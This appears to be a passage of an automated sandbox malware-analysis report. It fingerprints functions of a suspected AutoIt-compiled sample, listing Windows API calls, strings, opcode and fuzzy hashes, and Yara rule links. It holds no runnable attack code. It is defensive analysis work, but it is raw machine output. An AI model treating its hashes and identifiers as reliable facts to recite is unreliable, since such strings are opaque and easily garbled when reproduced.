                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00442AFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: InternetOpen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: <local>
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2038078732-4266983199
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004695F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 455545452-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046956F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 455545452-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00461774 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _strncmp
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ,$UTF8)
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 909875538-2632631837
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00461772 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _strncmp
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ,$UTF8)
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 909875538-2632631837
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004560AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004560E9
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend_mallocwsprintf
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %d/%02d/%02d
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1262938277-328681919
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00442262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044222A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000), ref: 00442247
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00439514 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Message_doexit
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1993061046-4017498283
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E